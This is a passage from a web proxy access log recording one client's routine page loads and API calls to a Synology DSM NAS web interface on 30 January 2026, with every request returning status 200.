AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/07d87cfdf16ea8886709ecad67ac55f7.png" [Client 84.1.26.27] [Length 1068] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/dd419236e9fc389651fc2a76836cc31d.png" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/wdgt_icn_title_resource_monitor.png?v=42962-s9" [Client 84.1.26.27] [Length 836] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/SystemHealthWidget.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 3404] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/3c897e31395646e7a99f2edfe18b4636.png" [Client 84.1.26.27] [Length 343] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/7adb794f0fe9d4a77719e41e1a25e1f9.png" [Client 84.1.26.27] [Length 220] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[30/Jan/2026:13:44:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Echarts/echarts.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 239306] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/StorageUsageWidget.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 2236] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?_dc=1769780667906&SynoToken=rxy.D95tk.Pk.&action=%22external_ip%22&api=SYNO.Core.Desktop.Initdata&method=get&version=1" [Client 84.1.26.27] [Length 112] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/col-move-top.png?v=6813d550c46547038091cf81ed89300f" [Client 84.1.26.27] [Length 965] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/1x/dd_icn.png?v=e1722eaca6356b2af4425e49a3c8a5b1" [Client 84.1.26.27] [Length 1161] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/resources/css/desktop.css?v=1661421011" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/col-move-bottom.png?v=d5dbff884dc200e502ea46e943f54957" [Client 84.1.26.27] [Length 967] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/resources/images/default/s.gif" [Client 84.1.26.27] [Length 43] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Echarts/syno_echarts_patch.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1126] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/resource.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 42550] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/resource_widget.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 8424] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Chooser/Chooser.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 3238] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ConfigBackup/config_backup.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 10113] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TaskSchedulerUtils/TaskSchedulerUtils.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 8222] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AppNotify/AppNotify.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1295] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/S2S.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 773] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/PasswordConfirmDialog.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 829] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/DirectoryServiceVueBundle.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 2582] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/image_load.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 580] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileBrowserUtil.js?v=1.3.4-1404&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 16195] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/domain-filter.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 678] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemStatusChecker/SystemStatusChecker.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1550] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/FileTaskUtil.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 640] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/UploadUtil.js?v=1.3.4-1404&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 6974] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ExternalDevices/EjectableDeviceList.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 3055] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/EnableNewUpdateSetting/EnableNewUpdateSetting.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 2986] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ActiveInsightUpdateNotify/ActiveInsightUpdateNotify.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1902] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/cloudstation_util.js?v=3.2.1-23280&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 11953] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Share/PermissionDialog.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 19733] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/directory-admin-list-dialog.js?v=4.15.9-0644&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 3025] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/tinymce.min.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 299542] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 9725] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/cloudstation_fbext.js?v=3.2.1-23280&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1817] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/utils.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 6011] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/PercentageBar.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 824] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/lazyDataView.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 2838] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileChooser/FileChooser.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 12453] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/MyDSCenter/MyDSCenter.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1827] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/DSMNotifyVueBundle.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 6327] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileSharing/FileSharing.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/LoginStyleVueBundle.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 20123] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_notification.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1226] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMUpdateNotify/DSMUpdateAction.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 562] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DiskMessageHandler/DiskMessageApp.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1352] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PollingTask/PollingTask.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 2159] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PortEnable/PortEnable.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 2571] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/NotificationVueBundle.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 14148] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/domain-options-dialog.js?v=4.15.9-0644&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1350] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 51689] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/core.js?v=2.7.2-2464&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1900] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 17628] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 46368] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyPhotos/extjs/fileStationExtension.min.js?v=1.3.4-0340&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 415] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DisableAdminNotification/DisableAdminNotification.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1682] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 46368] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/image_selector.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 6034] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_component.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 3604] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/core.js?v=3.2.1-23280&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 6932] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Share/CustomColumn.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1601] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/BackgroundTaskGrid.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1711] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/svg/checkbox.svg" [Client 84.1.26.27] [Length 4052] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/TaskGrid.js?v=1.3.4-1404&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1458] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 